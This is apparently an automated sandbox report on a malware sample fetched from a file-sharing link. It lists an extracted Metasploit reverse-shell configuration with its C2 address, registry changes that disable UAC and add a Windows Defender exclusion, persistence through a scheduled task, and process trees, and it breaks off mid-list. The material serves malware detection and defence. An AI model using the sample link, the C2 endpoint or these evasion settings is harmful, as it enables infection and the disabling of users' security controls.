metasploit | hxxps://mega[.]nz/file/I10QUThQ#Anbkjc-YrdZPf7fecurNRZcgElIZtB6RdAWa5zR-ecc4

Resubmissions

23/09/2023, 14:56

230923-sa9z1sgf6v 10

22/09/2023, 16:04

230922-thw9kaba83 10

22/09/2023, 16:01

230922-tf9f4shb2y 10

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
22/09/2023, 16:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/I10QUThQ#Anbkjc-YrdZPf7fecurNRZcgElIZtB6RdAWa5zR-ecc4

Score

10^/10

metasploit backdoor evasion trojan

Malware Config

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

172.94.88.173:5500

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Defender = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Defender = "0"	reg.exe

Nirsoft 2 IoCs

resource	yara_rule
behavioral1/files/0x000600000002310f-262.dat	Nirsoft
behavioral1/files/0x000600000002310f-265.dat	Nirsoft

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4712	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
5832	builder #6.exe
6032	AdvancedRun.exe
1864	Windows Process.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
6060	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 51 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	builder #6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000090000000	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	builder #6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "2"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	builder #6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	builder #6.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	builder #6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	builder #6.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings	Winlocker Builder.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	builder #6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	builder #6.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2032	msedge.exe
2032	msedge.exe
4016	msedge.exe
4016	msedge.exe
2312	identity_helper.exe
2312	identity_helper.exe
3780	msedge.exe
3780	msedge.exe
6032	AdvancedRun.exe
6032	AdvancedRun.exe
6032	AdvancedRun.exe
6032	AdvancedRun.exe
5780	msedge.exe
5780	msedge.exe
5780	msedge.exe
5780	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5832	builder #6.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: 33	216	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	216	AUDIODG.EXE
Token: SeDebugPrivilege	6032	AdvancedRun.exe
Token: SeImpersonatePrivilege	6032	AdvancedRun.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe
4016	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5832	builder #6.exe
5832	builder #6.exe
5832	builder #6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 4996	4016	msedge.exe	85
PID 4016 wrote to memory of 4996	4016	msedge.exe	85
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 3752	4016	msedge.exe	88
PID 4016 wrote to memory of 2032	4016	msedge.exe	87
PID 4016 wrote to memory of 2032	4016	msedge.exe	87
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89
PID 4016 wrote to memory of 1424	4016	msedge.exe	89

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5156	attrib.exe
4712	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/I10QUThQ#Anbkjc-YrdZPf7fecurNRZcgElIZtB6RdAWa5zR-ecc4
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa65246f8,0x7ffaa6524708,0x7ffaa6524718
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
  2⤵
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
  2⤵
  PID:1424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:3460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5204 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5840 /prefetch:8
  2⤵
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5840 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  PID:4800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
